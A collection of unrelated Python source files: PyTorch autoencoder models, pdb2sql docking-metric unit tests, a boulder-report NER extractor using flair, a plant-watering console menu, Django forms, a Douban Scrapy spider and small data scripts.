torch.save(self.decoder.state_dict(), f'{path}/Decoder')
torch.save(self.classifier.state_dict(), f'{path}/Classifier')
class Encoder3(nn.Module):
def __init__(self):
super(Encoder3, self).__init__()
self.conv1 = nn.Conv2d(3, 12, 3, stride=1, padding=1)
self.conv2 = nn.Conv2d(12, 24, 3, stride=1, padding=1)
self.conv3 = nn.Conv2d(24, 48, 3, stride=2, padding=1)
# self.pool1 = nn.MaxPool2d(2, stride=2)
# self.pool2 = nn.MaxPool2d(2, stride=2)
self.dp1 = nn.Dropout2d(p=0.1)
self.dp2 = nn.Dropout2d(p=0.1)
self.bn1 = nn.BatchNorm2d(12)
self.bn2 = nn.BatchNorm2d(24)
self.bn3 = nn.BatchNorm2d(48)
def forward(self, img):
x = self.conv1(img)
# x = self.bn1(x)
x = self.dp1(x)
x = F.relu(x)
# x = self.pool1(x)
x = self.conv2(x)
# x = self.bn2(x)
x = self.dp2(x)
x = F.relu(x)
# x = self.pool2(x)
x = self.conv3(x)
# x = self.bn3(x)
x = F.elu(x)
return x
class Decoder3(nn.Module):
def __init__(self):
super(Decoder3, self).__init__()
self.deconv3 = nn.ConvTranspose2d(48, 24, 4, stride=2, padding=1)
self.deconv2 = nn.ConvTranspose2d(24, 12, 3, stride=1, padding=1)
self.deconv1 = nn.ConvTranspose2d(12, 3, 3, stride=1, padding=1)
# self.upsample2 = nn.Upsample(scale_factor=2)
# self.upsample1 = nn.Upsample(scale_factor=2)
self.bn3 = nn.BatchNorm2d(24)
self.bn2 = nn.BatchNorm2d(12)
def forward(self, x):
x = self.deconv3(x)
# x = self.bn3(x)
x = F.relu(x)
# x = self.upsample2(x)
x = self.deconv2(x)
# x = self.bn2(x)
x = F.relu(x)
# x = self.upsample1(x)
x = self.deconv1(x)
x = torch.sigmoid(x)
return x
class Classifier3(nn.Module):
def __init__(self):
super(Classifier3, self).__init__()
self.conv1 = nn.Conv2d(48, 48, 3, padding=1)
self.conv2 = nn.Conv2d(48, 48, 3, stride=1, padding=1)
self.conv3 = nn.Conv2d(48, 48, kernel_size=3, stride=1, padding=1)
self.bn1 = nn.BatchNorm2d(48)
self.bn2 = nn.BatchNorm2d(48)
self.pool1 = nn.MaxPool2d(2, stride=2)
self.pool2 = nn.MaxPool2d(2, stride=2)
self.fc1 = nn.Linear(768, 256)
self.fc2 = nn.Linear(256, 64)
self.fc3 = nn.Linear(64, 10)
def forward(self, x):
x = F.relu(self.conv1(x))
x = self.bn1(self.pool1(x))
x = F.relu(self.conv2(x))
x = self.bn2(self.pool2(x))
x = F.dropout(F.relu(self.conv3(x)), p=0.1)
x = x.view(-1, 48 * 4 * 4)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class CAE3(nn.Module):
def __init__(self):
super(CAE3, self).__init__()
self.encoder = Encoder3()
self.decoder = Decoder3()
self.classifier = Classifier3()
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def classify(self, x):
x = self.encoder(x)
x = self.classifier(x)
return x
def save_model(self, path='model_weights'):
torch.save(self.encoder.state_dict(), f'{path}/Encoder3')
torch.save(self.decoder.state_dict(), f'{path}/Decoder3')
torch.save(self.classifier.state_dict(), f'{path}/Classifier3')
class Encoder4(nn.Module):
def __init__(self):
super(Encoder4, self).__init__()
self.conv1 = nn.Conv2d(1, 16, 3, stride=1, padding=1)
self.conv2 = nn.Conv2d(16, 8, 3, stride=1, padding=1)
self.conv3 = nn.Conv2d(8, 8, 3, stride=1, padding=1)
self.pool1 = nn.MaxPool2d(2, stride=2)
self.pool2 = nn.MaxPool2d(2, stride=2)
self.bn1 = nn.BatchNorm2d(16)
self.bn2 = nn.BatchNorm2d(8)
self.bn3 = nn.BatchNorm2d(8)
def forward(self, img):
x = self.conv1(img)
x = self.bn1(x)
x = F.elu(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.bn2(x)
x = F.elu(x)
x = self.pool2(x)
x = self.conv3(x)
x = self.bn3(x)
x = F.elu(x)
return x
class Decoder4(nn.Module):
def __init__(self):
super(Decoder4, self).__init__()
self.deconv3 = nn.ConvTranspose2d(8, 8, 3, stride=1, padding=1)
self.deconv2 = nn.ConvTranspose2d(8, 16, 3, stride=1, padding=1)
self.deconv1 = nn.ConvTranspose2d(16, 1, 3, stride=1, padding=1)
self.upsample2 = nn.Upsample(scale_factor=2)
self.upsample1 = nn.Upsample(scale_factor=2)
self.bn3 = nn.BatchNorm2d(8)
self.bn2 = nn.BatchNorm2d(16)
def forward(self, x):
x = self.deconv3(x)
x = self.bn3(x)
x = F.elu(x)
x = self.upsample2(x)
x = self.deconv2(x)
x = self.bn2(x)
x = F.elu(x)
x = self.upsample1(x)
x = self.deconv1(x)
x = torch.sigmoid(x)
return x
class Classifier4(nn.Module):
def __init__(self):
super(Classifier4, self).__init__()
self.fc1 = nn.Linear(512, 256)
self.fc2 = nn.Linear(256, 128)
self.fc3 = nn.Linear(128, 10)
def forward(self, x):
x = x.view(-1, 512)
x = self.fc1(x)
x = F.elu(x)
x = self.fc2(x)
x = F.elu(x)
x = self.fc3(x)
return x
class CAE4(nn.Module):
def __init__(self):
super(CAE4, self).__init__()
self.encoder = Encoder4()
self.decoder = Decoder4()
self.classifier = Classifier4()
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def classify(self, x):
x = self.encoder(x)
x = self.classifier(x)
return x
class Combine(nn.Module):
def __init__(self):
super(Combine, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(3, 8, 5, stride=2, padding=2),
nn.PReLU(),
nn.Conv2d(8, 8, 5, stride=2, padding=2),
nn.PReLU(),
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(8, 8, 6, stride=2, padding=2),
nn.PReLU(),
nn.ConvTranspose2d(8, 3, 6, stride=2, padding=2),
nn.Sigmoid(),
)
self.classifier = nn.Sequential(
nn.Linear(8 * 8 * 8, 126),
nn.ReLU(),
nn.Linear(126, 64),
nn.ReLU(),
nn.Linear(64, 10),
)
def forward(self, x):
encoded = self.encoder(x)
decoded = self.decoder(encoded)
predicted = self.classifier(encoded.view(-1, 8 * 8 * 8))
return decoded, predicted
def autoencode(self, x):
encoded = self.encoder(x)
return self.decoder(encoded)
def predict(self, x):
encoded = self.encoder(x)
return self.classifier(encoded.view(-1, 8 * 8 * 8))
"""
ae = AutoEncoder()
ae.encoder.load_state_dict(torch.load('model_weights/auto_encoder'))
"""
if __name__ == '__main__':
ae = AutoEncoder()
ae.encoder.load_state_dict(torch.load('model_weights/auto_encoder'))
print(ae)
|
import os
from pathlib import Path
from pdb2sql.StructureSimilarity import StructureSimilarity
import unittest
from . import pdb_folder
class TestSim(unittest.TestCase):
"""Test Similarity calculation."""
def setUp(self):
self.decoy = Path(pdb_folder, '1AK4', '1AK4_5w.pdb')
self.ref = Path(pdb_folder, '1AK4', 'target.pdb')
self.izone = Path(pdb_folder, '1AK4', 'target.izone')
self.lzone = Path(pdb_folder, '1AK4', 'target.lzone')
self.sim = StructureSimilarity(self.decoy, self.ref, enforce_residue_matching=False)
# target values are calcualted using scripts from
# https://github.com/haddocking/BM5-clean
self.irmsd = 1.135
self.lrmsd = 6.655
self.fnat = 0.790698
self.dockQ = 0.682191
self.capriClass = 'medium'
self.nclashes_ref = 4
####################################################################
# test check_residues to see if pdb files match or not
####################################################################
def test_check_residues(self):
decoy = Path(pdb_folder, '1AK4', '1AK4_5w_nonmatch.pdb')
with self.assertRaisesRegex(ValueError,
'Residue numbering not identical'):
sim = StructureSimilarity(decoy, self.ref)
sim.check_residues()
####################################################################
# test i-rmsd
####################################################################
def test_irmsdfast_default(self):
"""verify compute_irmsd_fast()"""
result = self.sim.compute_irmsd_fast()
self.assertEqual(result, self.irmsd)
def test_irmsdfast_izone(self):
"""verify compute_irmsd_fast(izone='fast.izone)"""
result = self.sim.compute_irmsd_fast(izone=self.izone)
self.assertEqual(result, self.irmsd)
def test_irmsdfast_method(self):
"""verify compute_irmsd_fast(method='quaternion')"""
result = self.sim.compute_irmsd_fast(method='quaternion')
self.assertEqual(result, self.irmsd)
def test_irmsdfast_check(self):
"""verify compute_irmsd_fast(check=False)"""
result = self.sim.compute_irmsd_fast(check=False)
self.assertEqual(result, self.irmsd)
def test_irmsdsql_default(self):
"""verify compute_irmsd_pdb2sql()"""
result = self.sim.compute_irmsd_pdb2sql()
self.assertEqual(result, self.irmsd)
def test_irmsdsql_izone(self):
"""verify compute_irmsd_pdb2sql(izone='sql.izone)"""
result = self.sim.compute_irmsd_pdb2sql(izone=self.izone)
self.assertEqual(result, self.irmsd)
def test_irmssql_method(self):
"""verify compute_irmsd_pdb2sql(method='quaternion')"""
result = self.sim.compute_irmsd_pdb2sql(method='quaternion')
self.assertEqual(result, self.irmsd)
def test_irmsdsql_exportpdb(self):
"""verify compute_irmsd_pdb2sql(exportpath='.')"""
result = self.sim.compute_irmsd_pdb2sql(exportpath='.')
self.assertEqual(result, self.irmsd)
self.assertTrue(os.path.isfile('./irmsd_ref.pdb'))
self.assertTrue(os.path.isfile('./irmsd_decoy.pdb'))
self.assertTrue(os.path.getsize('./irmsd_ref.pdb') > 0)
self.assertTrue(os.path.getsize('./irmsd_decoy.pdb') > 0)
os.remove('./irmsd_ref.pdb')
os.remove('./irmsd_decoy.pdb')
####################################################################
# test l-rmsd
####################################################################
def test_lrmsdfast_default(self):
"""verify compute_lrmsd_fast()"""
result = self.sim.compute_lrmsd_fast()
self.assertEqual(result, self.lrmsd)
def test_lrmsdfast_lzone(self):
"""verify compute_lrmsd_fast(lzone='fast.lzone)"""
result = self.sim.compute_lrmsd_fast(lzone=self.lzone)
self.assertEqual(result, self.lrmsd)
def test_lrmsdfast_method(self):
"""verify compute_lrmsd_fast(method='quaternion')"""
result = self.sim.compute_lrmsd_fast(method='quaternion')
self.assertEqual(result, self.lrmsd)
def test_lrmsdsql_default(self):
"""verify compute_lrmsd_pdb2sql()"""
result = self.sim.compute_lrmsd_pdb2sql()
self.assertEqual(result, self.lrmsd)
def test_lrmsdsql_method(self):
"""verify compute_lrmsd_pdb2sql(method='quaternion')"""
result = self.sim.compute_lrmsd_pdb2sql(method='quaternion')
self.assertEqual(result, self.lrmsd)
def test_lrmsdsql_exportpdb(self):
"""verify compute_lrmsd_pdb2sql(exportpath='.')"""
result = self.sim.compute_lrmsd_pdb2sql(exportpath='.')
self.assertEqual(result, self.lrmsd)
self.assertTrue(os.path.isfile('./lrmsd_ref.pdb'))
self.assertTrue(os.path.isfile('./lrmsd_decoy.pdb'))
self.assertTrue(os.path.getsize('./lrmsd_ref.pdb') > 0)
self.assertTrue(os.path.getsize('./lrmsd_decoy.pdb') > 0)
os.remove('./lrmsd_ref.pdb')
os.remove('./lrmsd_decoy.pdb')
####################################################################
# test FNAT
####################################################################
def test_fnatfast_default(self):
"""verify compute_fnat_fast()"""
result = self.sim.compute_fnat_fast()
self.assertEqual(result, self.fnat)
def test_fnatsql_default(self):
"""verify compute_fnat_pdb2sql()"""
result = self.sim.compute_fnat_pdb2sql()
self.assertEqual(result, self.fnat)
####################################################################
# test dockQ
####################################################################
def test_dockQ_default(self):
"""verify compute_DockQScore()"""
result = self.sim.compute_DockQScore(self.fnat, self.lrmsd, self.irmsd)
self.assertEqual(result, self.dockQ)
####################################################################
# test CAPRI
####################################################################
def test_capri_default(self):
"""verify compute_CapriClass()"""
result = self.sim.compute_CapriClass(self.fnat, self.lrmsd, self.irmsd)
self.assertEqual(result, self.capriClass)
def test_capri_dummy(self):
"""verify compute_CapriClass()"""
fnat = [0.9, 0.8, 0.7, 0.5, 0.3, 0.1]
lrmsd = [0.8, 2.4, 6.2, 7.5, 12.0, 10.0]
irmsd = [0.6, 0.8, 1.6, 2.3, 3.1, 3.3]
targets = ['high', 'high', 'medium',
'acceptable', 'acceptable', 'acceptable']
results = []
for i, j, k in zip(fnat, lrmsd, irmsd):
results.append(self.sim.compute_CapriClass(i, j, k))
self.assertEqual(results, targets)
####################################################################
# test clashes
####################################################################
def test_clashes_default(self):
"""verify compute_clashes()"""
result = self.sim.compute_clashes(self.ref)
self.assertEqual(result, self.nclashes_ref)
if __name__ == '__main__':
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
pay = input('Enter your pay:')
dependants = input('How many people do you need to insure?')
def calc_taxes(num):
return pay * .07
def calc_insurance(dependants):
return dependants * 30
def calc_401k(num):
return pay * .05
def calc_net(pay, dependants):
taxes = calc_taxes(pay)
insurance = calc_insurance(dependants)
retirement = calc_401k(pay)
return pay - taxes - insurance - retirement
print(calc_net(pay, dependants))
|
import re
from os import name
import flair
from flair.data import Sentence
from flair.models import MultiTagger
from flair.models import SequenceTagger
from flair.tokenization import SegtokSentenceSplitter
import string
from word2number import w2n
# load the NER tagger
tagger = MultiTagger.load(['pos','ner'])
compass = []
with open('./dictionaries/compass.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha() or char == '.' or char == ',':
word += char
if len(word):
compass.append(word)
colours = []
with open('./dictionaries/colours.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha():
word += char
if len(word):
colours.append(word)
# This function will extract information about singular boulder paragraphs (ie. a numbered paragraph that refers to a single boulder), returns the attributes found within the paragraph
def find_boulder_from_paragraph(match,number):
paragraph = ""
for word in match.text:
paragraph += word + " "
# initialize sentence splitter
splitter = SegtokSentenceSplitter()
# use splitter to split text into list of sentences
sentences = splitter.split(paragraph)
size = None
location = None
rocktype = None
author = None
dims = None
numberofboulders = None
extra = None
weight = None
volume = None
distance = None
hasl = None
sentence_length = 0
rt_dict = {}
siz_pos = {}
aut_dict = {}
loc_dict = {}
dim_dict = {}
extra_dict = {}
comp_dict = {}
numbox = None
for flair_sentence in sentences:
# predict NER and POS tags
tagger.predict(flair_sentence)
if ("Boulders" in flair_sentence.to_original_text() or "boulders" in flair_sentence.to_original_text() or "Block" in flair_sentence.to_original_text() or "block" in flair_sentence.to_original_text()) and numberofboulders is None:
numberstring, numberofboulders = find_number(flair_sentence)
if numberstring:
for j, word in match.iterrows():
if numberstring in word['text']:
numbox = (word['left'], word['top'], word['width'], word['height'])
# Run find size to search the sentence for the size of the boulder of form L x B x H
can_siz_pos, can_size = find_size(flair_sentence,flair_sentence.to_original_text())
if can_size:
if size:
size += ' - ' + can_size
else:
size = can_size
# Get position of the size related features in the whole paragraph, This uses a different method to other features as the fractions
# used throughout report aren't picked up by the OCR which messes things up a bit.
if can_siz_pos:
for siz in can_siz_pos:
siz_pos[siz] = (can_siz_pos[siz][0]+sentence_length,can_siz_pos[siz][1]+sentence_length)
# Get the dimensions and numbers associated with them from the sentence, will be split into their different attributes
can_dim_dict, can_dims = find_dims(flair_sentence,flair_sentence.to_original_text())
if can_dims:
for dim in can_dims:
if "weight" in dim.casefold():
if weight:
weight += " - " + dim
else:
weight = dim
continue
if "volume" in dim.casefold():
if volume:
volume += " - " + dim
else:
volume = dim
continue
if "sea" in dim.casefold():
if hasl:
hasl += " - " + dim
else:
hasl = dim
continue
if "miles" in dim.casefold() or "yards" in dim.casefold():
if distance:
distance += dim
else:
distance = dim
continue
else:
# Else add to size
if size:
size += ' - ' + dim
else:
size = dim
if can_dim_dict:
for dim in can_dim_dict:
dim_hl_array = []
for j, word in match.iterrows():
if dim.casefold() in word['text'].casefold():
box = (word['left'], word['top'], word['width'], word['height'])
dim_hl_array.append(box)
if dim in dim_dict:
dim_dict[dim].extend(dim_hl_array)
else:
dim_dict[dim] = dim_hl_array
# Run find location to search the sentence for the location of the boulder.
can_loc_dict, can_location = find_location(flair_sentence,match,number)
# Just take first location found as there are so many..
if location is None and can_location:
location = can_location
if can_loc_dict:
for loc in can_loc_dict:
loc_hl_array = []
for j, word in match.iterrows():
if loc in word['text'] and len(loc):
if not loc[0].isupper() and len(loc) < 4:
continue
box = (word['left'], word['top'], word['width'], word['height'])
loc_hl_array.append(box)
if loc in loc_dict:
loc_dict[loc].extend(loc_hl_array)
else:
loc_dict[loc] = loc_hl_array
# Looking for locations that are mentioned within quotation marks !
openquote = False
can_loc_box = []
can_location = ""
for j, word in match.iterrows():
if len(can_location) > 30 and openquote:
openquote = False
elif ('“' in word['text'] or '¢' in word['text'] or '*' in word['text']) and not openquote:
can_location = word['text']
can_loc_box.append((word['left'], word['top'], word['width'], word['height']))
openquote = True
elif ('”' in word['text'] and openquote):
can_location += " " + word['text']
can_loc_box.append((word['left'], word['top'], word['width'], word['height']))
openquote = False
if location:
if can_location not in location:
location += ' - ' + can_location
else:
location = can_location
if can_location in loc_dict:
loc_dict[can_location].extend(can_loc_box)
else:
loc_dict[can_location] = can_loc_box
can_loc_box = []
elif openquote:
if len(can_location) < 3:
can_location += word['text']
else:
can_location += " " + word['text']
can_loc_box.append((word['left'], word['top'], word['width'], word['height']))
# Looking for compass directions..
for j, word in match.iterrows():
last_character = None
stripped_word = ""
for character in word['text'].replace(",", "."):
if character != last_character:
stripped_word += character
last_character = character
if stripped_word in compass:
if word['text'] in comp_dict:
comp_dict[word['text']].append((word['left'], word['top'], word['width'], word['height']))
else:
comp_dict[word['text']] = [(word['left'], word['top'], word['width'], word['height'])]
# Find author or citation reference
can_aut_dict, can_author = find_author(flair_sentence,number)
if author is None and can_author:
author = can_author
if can_aut_dict:
for aut in can_aut_dict:
if len(aut) < 4:
continue
aut_hl_array = []
for j, word in match.iterrows():
if aut.casefold() in word['text'].casefold():
box = (word['left'], word['top'], word['width'], word['height'])
aut_hl_array.append(box)
if aut in aut_dict:
aut_dict[aut].extend(aut_hl_array)
else:
aut_dict[aut] = aut_hl_array
# find the primary and secondary rocktypes in the sentence..
can_rts = find_rocktype(flair_sentence,flair_sentence.to_original_text())
if can_rts:
colour = None
for rt in can_rts:
if colour:
the_rt = colour + " " + rt
colour = None
elif rt in colours:
colour = rt
continue
else:
the_rt = rt
if rocktype:
if the_rt not in rocktype:
rocktype += ' - ' + the_rt
else:
rocktype = the_rt
for rt in can_rts:
rt_hl_array = []
for j, word in match.iterrows():
if rt.casefold() in word['text'].casefold():
box = (word['left'], word['top'], word['width'], word['height'])
rt_hl_array.append(box)
if rt in rt_dict:
rt_dict[rt].extend(rt_hl_array)
else:
rt_dict[rt] = rt_hl_array
can_extra_dict = find_extra(flair_sentence,flair_sentence.to_original_text())
if can_extra_dict:
colour = None
for ex in can_extra_dict:
if colour:
the_extra = colour + " " + ex
colour = None
elif ex in colours:
colour = ex
continue
else:
the_extra = ex
if extra:
if the_extra not in extra:
extra += ' - ' + the_extra
else:
extra = the_extra
for ext in can_extra_dict:
ext_hl_array = []
for j, word in match.iterrows():
if ext.casefold() in word['text'].casefold():
box = (word['left'], word['top'], word['width'], word['height'])
ext_hl_array.append(box)
if ext in extra_dict:
extra_dict[ext].extend(ext_hl_array)
else:
extra_dict[ext] = ext_hl_array
sentence_length += len(flair_sentence.to_original_text())
compass_directions = ""
for direction in comp_dict:
if len(compass_directions):
compass_directions += " - " + direction
else:
compass_directions = direction
if numberofboulders is None:
numberofboulders = 1
return loc_dict, siz_pos, rt_dict, aut_dict, location, size, rocktype, author, numberofboulders, numbox, extra_dict, extra, dim_dict, volume, weight, hasl, distance, comp_dict, compass_directions
ext_features = []
with open('./dictionaries/extra.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha():
word += char
if len(word):
ext_features.append(word)
def find_extra(flair_sentence, sentence):
exts = []
lastword = None
if any(ext.casefold() in sentence.casefold() for ext in ext_features):
for word in re.sub(r"[,.—;@#?!&$]+\ *", " ", sentence).split(" "):
if word.casefold() in ext_features:
if lastword:
ex_word = lastword + " " + word if lastword in colours else word
else:
ex_word = word
exts.extend(ex_word.split(' '))
lastword = word
if exts:
return list(dict.fromkeys(exts))
else:
return None
def find_number(flair_sentence):
for entity in flair_sentence.to_dict(tag_type='pos')['entities']:
for label in entity['labels']:
if "boulders" in entity['text']:
return None, None
if "CD" in label.value:
if not entity['text'].strip().isnumeric() and entity['text'].strip().isalpha():
try:
ret = int(w2n.word_to_num(entity['text']))
return entity['text'], ret
except:
return None, None
return None, None
def find_author(flair_sentence,number):
# Hard code for the keyword report found within brackets!
if number == 10 or number == 1:
author = None
auts = []
brackets = re.findall('\(.*?\)|\(.*?-', flair_sentence.to_original_text())
for bracket in brackets:
if "Report".casefold() in bracket.casefold():
if len(bracket) > 100:
continue
author = bracket
index = flair_sentence.to_original_text().casefold().find(bracket.casefold())
auts.extend(bracket.split(' '))
return auts, author
author = None
auts = []
for entity in flair_sentence.to_dict(tag_type='ner')['entities']:
for label in entity['labels']:
if "PER" in label.value:
if author:
author += ", " + entity['text']
else:
author = entity["text"]
auts.extend(entity['text'].split(' '))
if auts:
return auts, author
else:
return None, None
dimensions = []
with open('./dictionaries/dimensions.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha():
word += char
if len(word):
dimensions.append(word)
metrics = []
with open('./dictionaries/metrics.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha():
word += char
if len(word):
metrics.append(word)
# This function analyses a sentence to extract size information relating to height and width
def find_dims(flair_sentence,sentence):
# Needs a bit more work! none type error so far... :/ TODO 16/07
dims = []
size = []
# if dimension != 'above' could be the play
if any(dimension in sentence for dimension in dimensions):
number = None
dim = None
met = None
for entity in flair_sentence.to_dict(tag_type='pos')['entities']:
if entity['text'].casefold() in dimensions:
if dim and entity['text'] == 'above':
continue
dim = entity['text']
for label in entity["labels"]:
if "CD" in label.value:
if any(metric in sentence[entity['start_pos']-5:entity['end_pos']+12] for metric in metrics if metric != "miles" and metric != "yards"):
number = entity['text']
met = None
if any(sub.isnumeric() for sub in sentence[entity['start_pos']+len(entity['text']):entity['end_pos']+12].split(" ")):
continue
for metric in metrics:
if metric in sentence[entity['start_pos']+len(entity['text']):entity['end_pos']+12]:
if met:
met += " " + metric
else:
met = metric
if (dim and number and met) or (number and met):
if dim is None:
if "cubic" in met:
dim = "volume"
elif "tons" in met:
dim = "weight"
else:
continue
if "high" in dim or "height" in dim or "above" in dim:
try:
if "sea" in sentence[entity['start_pos']-5:entity['end_pos']+20] or w2n.word_to_num(number) > 100:
if dim not in dims:
dims.append(dim)
dim = 'height above sea level'
except:
print("Nan : " + number)
number = None
continue
if dim == "above":
dim = None
continue
size.append(dim + " : " + number + " " + met)
if dim not in dims:
dims.extend(dim.split(' '))
if number not in dims:
dims.append(number)
if met not in dims:
dims.extend(met.split(' '))
number = None
dim = None
met = None
if dims:
return list(dict.fromkeys(dims)), size
else:
return None, None
def find_size(flair_sentence,sentence):
size = re.findall("([0-9]+ (X|x) [0-9]+ (X|x) [0-9]+|[0-9]+ (X|x) [0-9]+)",sentence)
# hopefully will just be a simple l x b x h
if size:
siz_dict = {}
sizes = None
for match in size:
for submatch in list(match):
if len(submatch) > 3:
index = sentence.find(submatch)
siz_dict[match] = (index,index+len(submatch))
if sizes:
sizes += ", " + submatch
else:
sizes = submatch
return siz_dict, sizes
return None, None
# This function analyses a sentence to extract the rock type mentioned
rocktypes = []
with open('./dictionaries/rocktypes.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha():
word += char
if len(word):
rocktypes.append(word)
def find_rocktype(flair_sentence, sentence):
rts = []
lastword = None
if any(rocktype.casefold() in sentence.casefold() for rocktype in rocktypes):
for word in re.sub(r"[,.—;@#?!&$]+\ *", " ", sentence).split(" "):
if word.casefold() in rocktypes:
if lastword:
ex_word = lastword + " " + word if lastword in colours else word
else:
ex_word = word
rts.extend(ex_word.split(" "))
lastword = word
if rts:
return list(dict.fromkeys(rts))
else:
return None
# This function analyses a sentence to extract the main location mentioned
# TODO needs more accurate location !
def find_location(flair_sentence,match,number):
location = ''
locs = []
# Manual override for first report as the text orientation is consistent
if number == 1:
senlen = 0
for word in match.iterrows():
if word[1]['left'] < 900:
if not word[1]['text'].isupper():
location = word[1]['text']
locs.append(word[1]['text'])
senlen += len(word[1]['text'])
location = location.split(".—")[0]
for entity in flair_sentence.to_dict(tag_type='ner')['entities']:
for label in entity["labels"]:
if "LOC" in label.value:
if not len(location):
location = entity["text"]
elif entity['text'] not in location:
location += " - " + entity["text"]
locs.extend(entity['text'].split(' '))
if locs:
return locs, location
else:
return None, None
|
import collections
import configparser
import sys
import os.path
from terminaltables import AsciiTable
from plantscheduling.JsonImpl import JsonImpl
from plantscheduling.PickleImpl import PickleImpl
from plantscheduling.PlantImpl import PlantImpl
from plantscheduling.YAMLImpl import YAMLImpl
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
class Display:
config = configparser.ConfigParser()
config.read('serialization.cfg')
serializationType = config['Current Method']['id']
menu = {}
menu['1'] = "Add Plant."
menu['2'] = "Delete Plant."
menu['3'] = "Show Timetable."
menu['4'] = "Serialize in preferable way"
menu['5'] = "Exit."
def displayMenu(self, inputfunc=input):
"""View implementation,
that creates a simple menu in console.
"""
sortedmenu = collections.OrderedDict(sorted(self.menu.items()))
for entry in sortedmenu:
print(entry, self.menu[entry])
while True:
selection = inputfunc("Please Select:")
if selection == '1':
name = input("Enter name of the plant: ")
type = input("Enter type of the plant: ")
actiontype = input("Enter type of the watering: ")
date = input("Enter date of the watering: ")
time = input("Enter time of the watering: ")
PlantImpl.newEvent(name, type, actiontype, date, time)
elif selection == '2':
name = input("Enter name of the plant to be deleted: ")
PlantImpl.deleteEvent(name)
elif selection == '3':
table = AsciiTable(PlantImpl.displayTable())
print(table.table)
elif selection == '4':
if self.serializationType == '1':
JsonImpl().writeJson('data.json', 'w', PlantImpl.actionlist)
print('Saved to JSON')
elif self.serializationType == '2':
PickleImpl().writePickle('data.p', 'wb', PlantImpl.actionlist)
print('Saved to Pickle')
elif self.serializationType == '3':
YAMLImpl().writeYAML('data.yaml', 'w', PlantImpl.actionlist)
print('Saved to YAML')
else:
print("Oops, something wrong with configuration file.")
elif selection == '5':
break
else:
print("Unknown Option Selected!")
if __name__ == "__main__":
disp = Display()
disp.displayMenu()
|
from django import forms
from .models import Post, Categories
choices = Categories.objects.all().values_list('cat_name','cat_name')
choice_list = []
for item in choices:
choice_list.append(item)
class PostForm(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'category', 'content', 'snippet', 'post_thumbnail_image')
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control', 'placeholder':'Tytuł posta'}),
'category': forms.Select(choices=choice_list, attrs={'class': 'form-control'}),
'content': forms.Textarea(attrs={'class': 'form-control', 'placeholder':'Treść posta'}),
'snippet': forms.TextInput(attrs={'class': 'form-control'}),
}
class EditForm(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'content', 'snippet')
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control', 'placeholder':'Tytuł posta'}),
'content': forms.Textarea(attrs={'class': 'form-control', 'placeholder':'Treść posta'}),
'snippet': forms.TextInput(attrs={'class': 'form-control'}),
}
|
# -*- coding: utf-8 -*-
from scrapy.contrib.spiders import CrawlSpider
from scrapy.http import Request
from scrapy.selector import Selector
from douban.items import DoubanItem
class Douban(CrawlSpider):
name = "douban"
redis_key = 'douban:start_urls'
start_urls = ['http://movie.douban.com/top250']
url = 'http://movie.douban.com/top250'
def parse(self, response):
#print response.body
#print response.url
item = DoubanItem()
selector = Selector(response)
Movies = selector.xpath('//div[@class="info"]')
for eachMovie in Movies:
title = eachMovie.xpath('div[@class="hd"]/a/span/text()').extract()
fullTitle = ''
for each in title:
fullTitle += each
movieInfo = eachMovie.xpath('div[@class="bd"]/p/text()').extract()
star = eachMovie.xpath('div[@class="bd"]/div[@class="star"]/span[4]/text()').extract()
quote = eachMovie.xpath('div[@class="bd"]/p[@class="quote"]/span/text()').extract()
if quote:
quote = quote[0]
else:
quote = ''
# print fullTitle
# print movieInfo
# print star
# print quote
item['title'] = fullTitle
item['movieInfo'] = ';'.join(movieInfo)
item['star'] = star
item['quote'] = quote
yield item
nextLink = selector.xpath('//span[@class="next"]/link/@href').extract()
if nextLink:
nextLink = nextLink[0]
print nextLink
yield Request(self.url + nextLink, callback=self.parse)
|
import os
import TMBdataset as tmbdat
import re
import numpy as _N
import matplotlib.pyplot as _plt
dirlist = os.listdir("../DATA/TMB1")
ROUNDS = 3
complete_dat = []
for directory in dirlist:
if os.path.isdir("../DATA/TMB1/%s" % directory):
days = os.listdir("../DATA/TMB1/%s" % directory)
for participant in days:
ma = re.search(r"\d{8}_\d{4}-\d{2}_\d{4}\.\d{4}", participant)
if ma is not None:
# check if files are there
path_to_participant = "../DATA/TMB1/%(d)s/%(p)s" % {"p" : participant, "d" : directory}
dat = tmbdat.TMBdataset(participant, path_to_participant)
if dat.STARTED_ROUNDS and dat.visit_status[0] >= tmbdat.COMPLETED_3_ROUNDS:
complete_dat.append(dat)
# now look at complete_dat
for cd in complete_dat:
visits = len(cd.visit_status)
wtl_all = _N.zeros((ROUNDS, tmbdat.GAMES))
for cd in range(len(complete_dat)):
wtl_all += complete_dat[cd].player_netwin[0]
wtl_all /= len(complete_dat)
fig = _plt.figure(figsize=(5, 8))
fig.add_subplot(3, 1, 1)
_plt.plot(wtl_all[0], color="black")
_plt.ylim(-1, 6)
_plt.axhline(y=0, ls=":")
_plt.title("WTL-type rule")
fig.add_subplot(3, 1, 2)
_plt.plot(wtl_all[1], color="black")
_plt.ylim(-1, 6)
_plt.axhline(y=0, ls=":")
_plt.title("mimic-type rule")
fig.add_subplot(3, 1, 3)
_plt.plot(wtl_all[2], color="black")
_plt.ylim(-1, 6)
_plt.axhline(y=0, ls=":")
_plt.title("random-bias rule")
_plt.savefig("doTMB")
fig.subplots_adjust(wspace=0.3, hspace=0.3)
|
from os import path
def dump(filename, list):
file = open("bulks/"+filename+".bulk", "w", encoding='utf-8')
for item in list:
text = str(item.bulk())
file.write(text+'\n')
file.close()
return path.abspath(file.name)
|
